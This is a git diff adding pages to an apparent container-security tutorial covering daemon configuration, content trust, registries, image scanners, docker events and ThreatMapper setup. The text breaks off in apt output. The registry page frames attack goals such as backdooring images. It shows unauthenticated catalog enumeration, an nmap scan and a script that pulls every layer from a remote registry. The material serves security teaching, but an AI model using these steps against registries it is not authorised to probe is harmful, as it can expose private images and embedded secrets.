"exec-opts": [], //execution options + "exec-root": "",//The root directory of the file in the execution state + "experimental": false,//whether to enable experimental features + "features": {},//Enable or disable specific features. Such as: {"buildkit": true} makes buildkit the default docker image builder. + "storage-driver": "",//Storage driver type + "storage-opts": [],//storage options + "labels": [],//key-value pair label docker metadata + "live-restore": true, //whether to keep the container alive when dockerd hangs up (to avoid the container exit caused by the docker service exception) + "log-driver": "json-file",//The driver of the container log + "log-opts": { + "max-size": "10m", + "max-file": "5", + "labels": "somelabel", + "env": "os,customer" + },//Options for container logs + "mtu": 0,//Set container network MTU (Maximum Transmission Unit) + "pidfile": "",//The location of the daemon PID file + "cluster-store": "",//URL of the cluster storage system + "cluster-store-opts": {},//Configure cluster storage + "cluster-advertise": "",//External address name + "max-concurrent-downloads": 3,//Set the maximum concurrency of each pull process + "max-concurrent-uploads": 5,//Set the maximum concurrency of each push process + "default-shm-size": "64M",//Set the default shared memory size + "shutdown-timeout": 15,//Set the shutdown timeout period + "debug": true,//Enable debug mode + "hosts": [],//The listening address of the dockerd daemon process + "log-level": "",//log level + "tls": true, //Enable the Transport Layer Security Protocol TLS + "tlsverify": true, //Enable the transport layer security protocol and verify the remote address + "tlscacert": "",//CA signature file path + "tlscert": "",//TLS certificate file path + "tlskey": "",//TLS key file path + "swarm-default-advertise-addr": "", //swarm external address + "api-cors-header": "",//Set CORS (Cross-origin resource sharing) header + "selinux-enabled": false,//Enable selinux (mandatory access control for users, processes, applications, files) + "userns-remap": "",//Set user/group for user namespace + "group": "", //Docker is in the group + "cgroup-parent": "",//Set the parent class of cgroup of all containers + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 64000, + "Soft": 64000 + } + },//Set the ulimit of all containers + "init": false,//The container performs initialization to forward signals or control (reap) processes + "init-path": "/usr/libexec/docker-init", //docker-init file path + "ipv6": false,//support IPV6 network + "iptables": false,//Enable firewall rules + "ip-forward": false, //Open net.ipv4.ip_forward + "ip-masq": false,//Enable ip masking (the technology of rewriting the source IP address or destination IP address when the IP packet passes through a router or firewall) + "userland-proxy": false, //userland proxy + "userland-proxy-path": "/usr/libexec/docker-proxy", //userland proxy path + "ip": "0.0.0.0",//Default IP + "bridge": "",//Attach the container to the bridge identifier on the bridge network + "bip": "",//Specify bridge IP + "fixed-cidr": "",//(ipv4) subnetting, that is, limiting the range of ip address allocation to control the network segment to which the container belongs to achieve network access between containers (the same host or between different hosts) + "fixed-cidr-v6": "", //(ipv6) subnetting + "default-gateway": "",//default gateway + "default-gateway-v6": "",//default ipv6 gateway + "icc": false,//Inter-container communication + "raw-logs": false, //raw logs (no color, full timestamp) + "allow-nondistributable-artifacts": [],//Registry warehouse submitted by products that are not distributed externally + "registry-mirrors": [],//registry warehouse mirror acceleration address + "seccomp-profile": "", //seccomp configuration file + "insecure-registries": [],//Configure non-https registry address + "no-new-privileges": false, //Disable new privileges + "default-runtime": "runc", //OCI alliance (The Open Container Initiative) default runtime environment + "oom-score-adjust": -500,//Priority of memory overflow being killed (-1000~1000) + "node-generic-resources": ["NVIDIA-GPU=UUID1", "NVIDIA-GPU=UUID2"],//Resource nodes announced to the public + "runtimes": { + "cc-runtime": { + "path": "/usr/bin/cc-runtime" + }, + "custom": { + "path": "/usr/local/bin/my-runc-replacement", + "runtimeArgs": [ + "--debug" + ] + } + },//Runtime + "default-address-pools": [ + {"base":"172.80.0.0/16","size":24}, //Default dhcp assigned address + {"base":"172.90.0.0/16","size":24} + ] +} + +``` diff --git a/content/en/containersecurity/b22.DCT 2.md b/content/en/containersecurity/b22.DCT 2.md new file mode 100644 index 0000000..2e476f1 --- /dev/null +++ b/content/en/containersecurity/b22.DCT 2.md @@ -0,0 +1,53 @@ +--- +title: "Content Trust and Integrity checks" +slug: "Content-Trust-and-Integrity-checks" +--- + + +Content Trust and Integrity checks + +Docker Content Trust (DCT) makes it simple and easy to verify the integrity and the publisher of images that you download and run. This is especially important when pulling images over untrusted networks such as the internet. + + +```bash +docker trust key generate sangam +Generating key for sangam... +Enter passphrase for new nigel key with ID 1f78609: +Repeat passphrase for new nigel key with ID 1f78609: +Successfully generated and loaded private key.... public key available: /root/sangam.pub + + +``` + +```bash +$ docker trust signer add --key sangam.pub sangam sangam14/dct +Adding signer "nigel" to sangam14/dct... +Initializing signed repository for sangam/dct... +Enter passphrase for root key with ID aee3314: +Enter passphrase for new repository key with ID 1a18dd1: +Repeat passphrase for new repository key with ID 1a18dd1: +Successfully initialized "sangam14/dct" +Successfully added signer: nigel to sangam14/dct +``` + +```bash +docker trust sign sangam14/dct:signed + +docker trust inspect sangam14/dct:signed --pretty +``` + +# Enabling DCT + + +```bash +$ export DOCKER_CONTENT_TRUST=1 + +``` + +# verify the image + + +```bash +docker image pull sangam14/dct:unsigned +No valid trust data for unsigned +``` \ No newline at end of file diff --git a/content/en/containersecurity/b23.docker-registry 2.md b/content/en/containersecurity/b23.docker-registry 2.md new file mode 100644 index 0000000..07da913 --- /dev/null +++ b/content/en/containersecurity/b23.docker-registry 2.md @@ -0,0 +1,188 @@ +--- +title: "Docker Registry security configurations " +slug: "Docker-Registry-security-configurations" +--- + +What will you learn? + +- InteractIing with insecure registry with curl +- +Fetching images using curl and analyzing image layers +Attacking protected Docker registry +Backdooring images and leveraging auto-deployment mechanisms to attack Docker host + + +# Intracting with Insecure Registry + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker run -d \ + -p 5000:5000 \ + --name registry \ + -v /registry/data:/var/lib/registry \ + --restart always \ + registry:2 +Unable to find image 'registry:2' locally +2: Pulling from library/registry +ca7dd9ec2225: Pull complete +c41ae7ad2b39: Pull complete +1ed0fc8a6161: Pull complete +21df229223d2: Pull complete +626897ccab21: Pull complete +Digest: sha256:ce14a6258f37702ff3cd92232a6f5b81ace542d9f1631966999e9f7c1ee6ddba +Status: Downloaded newer image for registry:2 +729cabb707e247e548ff84aa096c03e922e39e78bbe3c65753478305575576a6 + + +``` + +check + +``` bash +[node1] (local) root@192.168.0.18 ~ +$ docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +729cabb707e2 registry:2 "/entrypoint.sh /etc…" 11 seconds ago Up 10 seconds 0.0.0.0:5000->5000/tcp registry + +``` + +pull image from docker hub and push to local registry + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker pull alpine:3.6 +3.6: Pulling from library/alpine +5a3ea8efae5d: Pull complete +Digest: sha256:66790a2b79e1ea3e1dabac43990c54aca5d1ddf268d9a5a0285e4167c8b24475 +Status: Downloaded newer image for alpine:3.6 +docker.io/library/alpine:3.6 +``` +push to local registry + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker tag alpine:3.6 localhost:5000/alpine:3.6 +[node1] (local) root@192.168.0.18 ~ +$ docker push localhost:5000/alpine:3.6 +The push refers to repository [localhost:5000/alpine] +721384ec99e5: Pushed +3.6: digest: sha256:36c3a913e62f77a82582eb7ce30d255f805c3d1e11d58e1f805e14d33c2bc5a5 size: 528 + +``` +remove image from local docker host + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker image remove localhost:5000/alpine:3.6 +Untagged: localhost:5000/alpine:3.6 +Untagged: localhost:5000/alpine@sha256:36c3a913e62f77a82582eb7ce30d255f805c3d1e11d58e1f805e14d33c2bc5a5 +``` +pull new image from local registry + +```bash +[node1] (local) root@192.168.0.18 ~ +$ docker pull localhost:5000/alpine:3.6 +3.6: Pulling from alpine +Digest: sha256:36c3a913e62f77a82582eb7ce30d255f805c3d1e11d58e1f805e14d33c2bc5a5 +Status: Downloaded newer image for localhost:5000/alpine:3.6 +localhost:5000/alpine:3.6 +[node1] (local) root@192.168.0.18 ~ +``` + +```bash +curl -s http://localhost:5000/v2/_catalog +{"repositories":["alpine"]} +ubuntu $ nmap -p 5000 localhost +Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-07 23:45 UTC +Nmap scan report for localhost (127.0.0.1) +Host is up (0.000064s latency). + +PORT STATE SERVICE +5000/tcp open upnp + +Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds +``` + +# Fetching images using curl and analyzing image layers + +```bash +ubuntu $ curl -s http://localhost:5000/v2/alpine/tags/list +{"name":"alpine","tags":["3.6"]} + +``` +/_catalog endpoint returns a list of repositories available in the registry. + +```bash +ubuntu $ curl -s http://localhost:5000/v2/alpine/manifests/3.6 + + + + +```bash + +{ + "schemaVersion": 1, + "name": "alpine", + "tag": "3.6", + "architecture": "amd64", + "fsLayers": [ + { + "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:5a3ea8efae5d0abb93d2a04be0a4870087042b8ecab8001f613cdc2a9440616a" + } + ], + "history": [ + { + "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:143f9315f5a85306192ccffd37fbfa65db21f67aaa938c2538bd50f52123a12f\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container\":\"fd086f4b9352674c6a1ae4d02051f95a4e0a55cda943c5780483938dedfb2d8f\",\"container_config\":{\"Hostname\":\"fd086f4b9352\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) \",\"CMD [\\\"/bin/sh\\\"]\"],\"ArgsEscaped\":true,\"Image\":\"sha256:143f9315f5a85306192ccffd37fbfa65db21f67aaa938c2538bd50f52123a12f\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-03-07T22:20:00.563496859Z\",\"docker_version\":\"18.06.1-ce\",\"id\":\"baaf9c1caf4fb211f173d053029997dcfade0644ac354c8a068e4ebf23fcf1c5\",\"os\":\"linux\",\"parent\":\"5d8f720b0ab2b92a29a7e338aa90cad32dac2bf6518c7aae5844aab896ee36ec\",\"throwaway\":true}" + }, + { + "v1Compatibility": "{\"id\":\"5d8f720b0ab2b92a29a7e338aa90cad32dac2bf6518c7aae5844aab896ee36ec\",\"created\":\"2019-03-07T22:20:00.434038891Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:9714761bb81de664e431dec41f12db20f0438047615df2ecd9fdc88933d6c20f in / \"]}}" + } + ], + "signatures": [ + { + "header": { + "jwk": { + "crv": "P-256", + "kid": "AHL3:52R5:PMFF:XHCJ:VYKX:OOEL:IUGD:JPPY:CLW4:HBE3:PSWY:CT6H", + "kty": "EC", + "x": "nsfDpo11GTUjCyx98IT4s4VJqns97kipPMB_nU-3JCs", + "y": "eaFL1-YY16GBI31WV-FgjRp6C-koWvsUqjJRFknMjDM" + }, + "alg": "ES256" + }, + "signature": "48-BseaiWn17IyGHwsEGnxCUxnkAyI8fmMIFP3Ry2mDF5o23dQiDMPcbH62ik2mNAxmWA5-yKrBtjTuIn5FXAw", + "protected": "eyJmb3JtYXRMZW5ndGgiOjIxMzAsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMy0wMS0wOFQwMDowMTozMFoifQ" + } + ] +} + +``` + + +```bash + +#!/bin/bash + +# Download all the fsLayers from the remote registry using curl command +# Usage: ./download.bash http://registry:5000 image [tag] + +URL="$1" +IMAGE="$2" +TAG="${3:-latest}" + +BLOBS=( $(curl "$URL/v2/$IMAGE/manifests/$TAG" -s | python -m json.tool | grep blobSum | cut -d '"' -f 4) ) + +for ((idx = 0 ; idx < ${#BLOBS[@]}; idx++)); do + BLOB=${BLOBS[$idx]} + SUMIDX=$(($idx + 1)) + DIR="$PWD/$IMAGE/$SUMIDX" + rm -rf "$DIR" ; mkdir -p "$DIR/fs" + + curl -s "$URL/v2/$IMAGE/blobs/$BLOB" -o "$DIR/layer.tar" + tar xf "$DIR/layer.tar" -C "$DIR/fs" +done +``` + diff --git a/content/en/containersecurity/b24.dockerscan 2.md b/content/en/containersecurity/b24.dockerscan 2.md new file mode 100644 index 0000000..c036727 --- /dev/null +++ b/content/en/containersecurity/b24.dockerscan 2.md @@ -0,0 +1,58 @@ +--- +title: "DockerScan" +slug: "dockerscan" +--- + +# DockerScan + + +Docker Scan Support actions for docker registory scanning , image analysis and image meta information exaction to look for password , URL/ IP etc in the envirmonment variavle and any kind of sudo call by user + + +1. create a directory for this + +``` +$ sudo mkdir dockersec-2 +$ cd dockersec-2 + +``` +check pyhon version which mustt be greater then 3.5 and must have pip installed + +``` +$ python3 --version +``` +``` +$ sudo apt install python3-pip +$ which pip3 +`` + +Install Dockerscan with pip3 + +``` +$ sudo /user/bin/pip3 install dockerscan + +``` + +pull the ngnix docker image from dockerhub + +``` +$ sudo docker pull ngnix +``` + + save the docker image using docker save + +``` +$ sudo docker save ngnix -o ng-orig +$ ls +``` + +scan the image + +``` + +sudo dockerscan image info ng-orig + +``` + +as we can see the information reveals the CMD runs , ENV variable , exposed ports etc + \ No newline at end of file diff --git a/content/en/containersecurity/b25.Dive 2.md b/content/en/containersecurity/b25.Dive 2.md new file mode 100644 index 0000000..5396f3a --- /dev/null +++ b/content/en/containersecurity/b25.Dive 2.md @@ -0,0 +1,74 @@ +--- +title: " Dive " +slug: "dive" +--- + +# Dive + + +* Ubuntu /Debian + +```bash +wget https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb sudo apt install ./dive_0.9.2_linux_amd64.deb +``` + +* RHEL/CemtOS + +```bash +curl -OL https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.rpm rpm -i dive_0.9.2_linux_amd64.rpm + +``` + +* Arch Linux + +```bash +ay -S dive + +``` + +Mac OS X + +```bash +brew install dive + +``` + +# How to use Dive + +To analyze a Docker image simply run dive with an image tag/id/digest: + +```bash + +$ dive +``` + +or if you want to build your image then jump straight into analyzing it: + +```bash +$ dive build -t +``` + +example ngnix image + +![](./images/dive.png) + + +another tool that make this all more easy + +https://github.com/prakhar1989/dive-in + +![](./images/1.png) + +![](./images/2.png) + + +# recommanded tool slim.ai + + +Remove friction by securing your software supply chain with optimized containers specific to your application needs, while automatically reducing vulnerabilities in the process. + + +https://slim.ai/ + +portal.slim.ai + diff --git a/content/en/containersecurity/b26.docker-events 2.md b/content/en/containersecurity/b26.docker-events 2.md new file mode 100644 index 0000000..0231c88 --- /dev/null +++ b/content/en/containersecurity/b26.docker-events 2.md @@ -0,0 +1,224 @@ +--- +title: "Docker events" +slug: "docker-events" +--- + +# Docker events + +Docker events describe the activities taken by your Docker daemon. Most interactions with objects such as containers, images, volumes, and networks record an event, creating a log that you can use to inspect past changes. + +There are many different kinds of event that identify specific changes in your environment: + +- Creating and removing containers +- Container health check statuses +- Commands executed inside containers with docker exec +- Pulling and pushing images +- Creating, destroying, mounting, and unmounting volumes +- Enabling and disabling Docker daemon plugins + +``` +$ docker run --rm hello-world + +``` + + +Several events should now appear in the terminal window that’s running the docker events command: + +``` +$ docker events +2022-05-31T15:20:00.267970018+01:00 image pull hello-world:latest (name=hello-world) +2022-05-31T15:20:00.347054862+01:00 container create 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 (image=hello-world, name=nifty_morse) +2022-05-31T15:20:00.347805277+01:00 container attach 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 (image=hello-world, name=nifty_morse) +2022-05-31T15:20:00.621070053+01:00 container start 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 (image=hello-world, name=nifty_morse) + +``` + +Each event displays on its own line. The event timestamp is displayed first, followed by the type of object affected (such as image or container) and then the action that was taken (like create, attach, and start). The remainder of the message contains useful metadata about the object. The example above reveals that the hello-world:latest image was pulled and a container created from it. + +Formatting Output + +The raw event list is often unwieldy. You can reformat the output using the --format flag which accepts a Go template string: + + +``` +$ docker events --format '{{ .Time }} {{ .Action }} {{ .Type}} {{ .ID }}' + +``` + + +Running this example will produce output that looks like this: + + +``` +1654006800 pull image hello-world:latest +1654006800 create container 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 +1654006800 attach container 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 +1654006800 start container 4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378 + +``` + +You can get events represented as JSON objects by using {{ json . }} as your template string: + +``` +$ docker events --format '{{ json . }}' | jq +{ + "status": "create", + "id": "4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378", + "from": "hello-world", + "Type": "container", + "Action": "create", + "Actor": { + "ID": "4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378", + "Attributes": { + "image": "hello-world", + "name": "nifty_morse" + } + }, + "scope": "local", + "time": 1654006800, + "timeNano": 1654006800347054800 +} + + +``` + +## Filtering Events + +``` + +docker events --filter type=container //Get all events that relate to containers. +docker events --filter event=create // Get container creation events. +docker events --filter container=demo-container –// Get all the events saved for the container called demo-container (you can reference the container’s ID or name). + +``` +Besides container, you can filter by all supported object type names such as image, network, and volume. + +Multiple filters are supported when you repeat the --filter flag. Distinct filters are interpreted as logical AND conditions; multiple uses of the same filter become OR clauses. Here’s an example which surfaces the create event for both the app-container and api-container containers: + +``` +$ docker events \ + --filter container=app-container + --filter container=api-container + --filter event=create + +``` + +## Accessing Historical Events + +docker events defaults to only showing events stored since the command’s been running. You can include historical events by adding the --since flag. This accepts a human-readable time expression or an absolute timestamp: + +``` + +$ docker events --since 1h +$ docker events --since '2022-06-01T16:00:00' +``` + +Events recorded after the given time will immediately be shown in your terminal. New events will continue to show up in real-time as they’re recorded. + +You can exclude events after a particular time with the --until flag. It works similarly to --since. Using --until will disable real-time streaming of new events because they’d fall outside the requested timeframe. + +## Streaming Docker Events From the Daemon REST API + +Another way to access stored events is through the Docker daemon REST API. You can use the /events endpoint to stream events in real-time after you’ve enabled the API on your Docker host. Events will be returned in JSON format: + +``` +$ curl http://127.0.0.1:2375/v1.41/events +{ + "Type": "container", + "Action": "create", + "Actor": { + "ID": "4a6c8d34a183363db5dbfdcc3cab4c82c4a341d719df56ec2e7f879ee8f02378", + "Attributes": { + "image": "hello-world", + "name": "nifty_morse" + } + }, + "scope": "local", + "time": 1654006800, + "timeNano": 1654006800347054800 +} +``` + +The API endpoint supports filter, since, and until parameters that have the same behaviors as their CLI counterparts. Here’s how to retrieve all container creation events recorded in the past hour: + +``` + +$ curl http://127.0.0.1:2375/v1.41/events?since=1h&filters={'type':'container','action':'create'} + + +``` + +## Sending Events to an External Service + +Docker lacks a built-in way to send events to an external service. This could be useful if you want all your container creations to be logged in an existing monitoring or auditing platform. + +You can set up your own solution by creating a system service that continually runs docker events. It should send each new line of output to your external system. + +First write a Bash script that implements the functionality you need: + +``` +#!/bin/bash +docker events --format '{{ .Time }} {{ .Action }} {{ .Type }} {{ .ID }}' | while read event +do + curl \ + -X POST \ + -H "Content-Type: application/json" \ + -d '{"event": "$event"}' \ + https://example.com/events +done + +``` + +Now create a new systemd service unit at `/etc/systemd/system/docker-events.service`: + +``` +[Unit] +Description=Custom Docker Event Monitoring Service + +[Service] +Type=forking +ExecStart=/usr/local/bin/docker-events.sh + +[Install] +WantedBy=multi-user.target + +``` + +Finally reload systemd to load your service, then start and enable the unit: + +``` +$ sudo systemctl daemon-reload +$ sudo systemctl start docker-events +$ sudo systemctl enable docker-events + +``` + + +## Docker events commands example + +Listening for Docker events + +``` +$ docker events +``` +Listening for events since a given date +``` +$ docker events --since '2015-01-28' +$ docker events --since '3m' +``` +Listening for Docker events based on filter +``` +$ docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' +$ docker events --filter 'event=stop' +$ docker events --filter 'image=ubuntu-1:14.04' +$ docker events --filter 'container=7805c1d35632' +$ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' +$ docker events --filter 'container=7805c1d35632' --filter 'event=stop' +$ docker events --filter 'type=volume' +$ docker events --filter 'type=network' +$ docker events --filter 'type=plugin' (experimental) +``` +Listening for Docker events based on format +``` +$ docker events --format '{{json .}}' +``` \ No newline at end of file diff --git a/content/en/containersecurity/b27.ThreatMapper-app 2.md b/content/en/containersecurity/b27.ThreatMapper-app 2.md new file mode 100644 index 0000000..a870a4a --- /dev/null +++ b/content/en/containersecurity/b27.ThreatMapper-app 2.md @@ -0,0 +1,611 @@ +--- +title: "Scanning Docker for vulnerabilities with ThraetMappeper " +slug: "Scanning-Docker-for-vulnerabilities-with-ThraetMappeper" +--- + +Orignally published on [CloudNativeFolks]() + +`ThreatMapper` + +ThreatMapper hunts for threats in your production platforms, and ranks these threats based on their risk-of-exploit. It uncovers vulnerable software components, exposed secrets and deviations from good security practice. ThreatMapper uses a combination of agent-based inspection and agent-less monitoring to provide the widest possible coverage to detect threats. + +[![Readme Card](https://github-readme-stats.vercel.app/api/pin/?username=deepfence&repo=Threatmapper)](https://github.com/deepfence/Threatmapper) + +ThreatMapper carries on the good 'shift left' security practices that you already employ in your development pipelines. It continues to monitor running applications against emerging software vulnerabilities and monitors the host and cloud configuration against industry-expert benchmarks. + +The ThreatMapper Management Console is a container-based application that can be deployed on a single docker host or in a Kubernetes cluster. + +# What exactly this management console useful for you? + +* Topology-based learning of your live infrastructure + + ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720063844/e189658b-8bdf-4ede-a19f-ce04cf8b089e.png) + + +* Identify Threats and Vulnerabilities and generate SBOM (software bill of material ) + + +* ThreatGraph visualization, you can then identify the issues that present the greatest risk to the security of your applications, and prioritize these for planned protection or remediation. + + ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720087970/619f0c7e-d251-4934-b165-6157cb3f3730.png ) + + +* Manage the users who can access the console. + +* Configure Infrastructure API access and interrogate platform configurations. + +* Visualize and drill down into Kubernetes clusters, virtual machines, containers and images, running processes, and network connections in near real-time. + +* Invoke vulnerability scans on running containers and applications and review the results, ranked by the risk of exploit. + +* Invoke compliance scans on infrastructure configuration ('agentless') and on infrastructure hosts ('agent-based), - manually or automatically when they are added to a cluster. + +* Scan container registries for vulnerabilities, to review workloads before they are deployed. + +* Scan image builds during the CI/CD pipeline, supporting CircleCI, Jenkins, and GitLab. + + ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720117091/e979935e-efa6-41b6-8a9d-75c08eb78771.png) + +* Scan containers and host filesystems for unprotected secrets, including access tokens, keys and passwords. + +* Configure integrations with external notification, SIEM and ticketing systems, including Slack, PagerDuty, Jira, Splunk, ELK, Sumo Logic, and AWS S3. ThreatMapper supports multiple production deployments simultaneously so that you can visualize and scan workloads across a large production estate. + + +in a short one-stop solution for your cloud-native security issues! and it's 100% open source + +login to AWS account:- console.aws.amazon.com + +## Deploy ThreatMapper Console using Docker Compose on Linux VM using AWS EC2 + +* Create Ubuntu Instance on AWS EC2 + + ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720154113/3f081a20-b6ce-4813-8673-17d3c9abe78e.png) + + +select instance type as per requirements + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720172313/ad01eb1e-b960-42e2-a317-dcefc1df36d5.png ) + +Click on the launch instance + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720215112/24a709fc-590c-4070-9e71-01dc27bb61b4.png ) + +hurry! + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720236656/29ee7c7d-20b6-4a3d-a16e-4b85e169d8a8.png ) + +access AWS instance using CLI + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720271742/4b073e41-046e-4a25-9fba-bcbc446f397b.png ) + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720285296/ac528a2e-54df-4ef9-98b8-2d2d0d292c22.png ) + +```rust +sudo apt install -y apt-transport-https ca-certificates curl software-properties-common +Reading package lists... Done +Building dependency tree... Done +Reading state information... Done +ca-certificates is already the newest version (20211016). +ca-certificates set to manually installed. +software-properties-common is already the newest version (0.99.22.3). +software-properties-common set to manually installed. +The following additional packages will be installed: + libcurl4 +The following NEW packages will be installed: + apt-transport-https +The following packages will be upgraded: + curl libcurl4 +2 upgraded, 1 newly installed, 0 to remove and 76 not upgraded. +Need to get 485 kB of archives. +After this operation, 169 kB of additional disk space will be used. +Get:1 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 apt-transport-https all 2.4.8 [1506 B] +Get:2 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-updates/main amd64 curl amd64 7.81.0-1ubuntu1.6 [194 kB] +Get:3 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-updates/main amd64 libcurl4 amd64 7.81.0-1ubuntu1.6 [290 kB] +Fetched 485 kB in 0s (11.0 MB/s) +Selecting previously unselected package apt-transport-https. +(Reading database ... 63926 files and directories currently installed.) +Preparing to unpack .../apt-transport-https_2.4.8_all.deb ... +Unpacking apt-transport-https (2.4.8) ... +Preparing to unpack .../curl_7.81.0-1ubuntu1.6_amd64.deb ... +Unpacking curl (7.81.0-1ubuntu1.6) over (7.81.0-1ubuntu1.4) ... +Preparing to unpack .../libcurl4_7.81.0-1ubuntu1.6_amd64.deb ... +Unpacking libcurl4:amd64 (7.81.0-1ubuntu1.6) over (7.81.0-1ubuntu1.4) ... +Setting up apt-transport-https (2.4.8) ... +Setting up libcurl4:amd64 (7.81.0-1ubuntu1.6) ... +Setting up curl (7.81.0-1ubuntu1.6) ... +Processing triggers for man-db (2.10.2-1) ... +Processing triggers for libc-bin (2.35-0ubuntu3.1) ... +Scanning processes... +Scanning linux images... + +Running kernel seems to be up-to-date. +``` + +# Install docker + +```rust +curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - +sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu focal stable" +apt-cache policy docker-ce +sudo apt install -y docker-ce +Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)). +OK +Repository: 'deb [arch=amd64] https://download.docker.com/linux/ubuntu focal stable' +Description: +Archive for codename: focal components: stable +More info: https://download.docker.com/linux/ubuntu +Adding repository. +Press [ENTER] to continue or Ctrl-c to cancel. +Found existing deb entry in /etc/apt/sources.list.d/archive_uri-https_download_docker_com_linux_ubuntu-jammy.list +Adding deb entry to /etc/apt/sources.list.d/archive_uri-https_download_docker_com_linux_ubuntu-jammy.list +Found existing deb-src entry in /etc/apt/sources.list.d/archive_uri-https_download_docker_com_linux_ubuntu-jammy.list +Adding disabled deb-src entry to /etc/apt/sources.list.d/archive_uri-https_download_docker_com_linux_ubuntu-jammy.list +Hit:1 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy InRelease +Hit:2 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-updates InRelease +Hit:3 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-backports InRelease +Hit:4 https://download.docker.com/linux/ubuntu focal InRelease +Hit:5 http://security.ubuntu.com/ubuntu jammy-security InRelease +Reading package lists... Done +W: https://download.docker.com/linux/ubuntu/dists/focal/InRelease: Key is stored in legacy trusted.gpg keyring (/etc/apt/trusted.gpg), see the DEPRECATION section in apt-key(8) for details. +docker-ce: + Installed: 5:20.10.21~3-0~ubuntu-focal + Candidate: 5:20.10.21~3-0~ubuntu-focal + Version table: + *** 5:20.10.21~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 100 /var/lib/dpkg/status + 5:20.10.20~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.19~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.18~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.17~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.16~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.15~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.14~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.13~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.12~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.11~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.10~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.9~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.8~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.7~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu 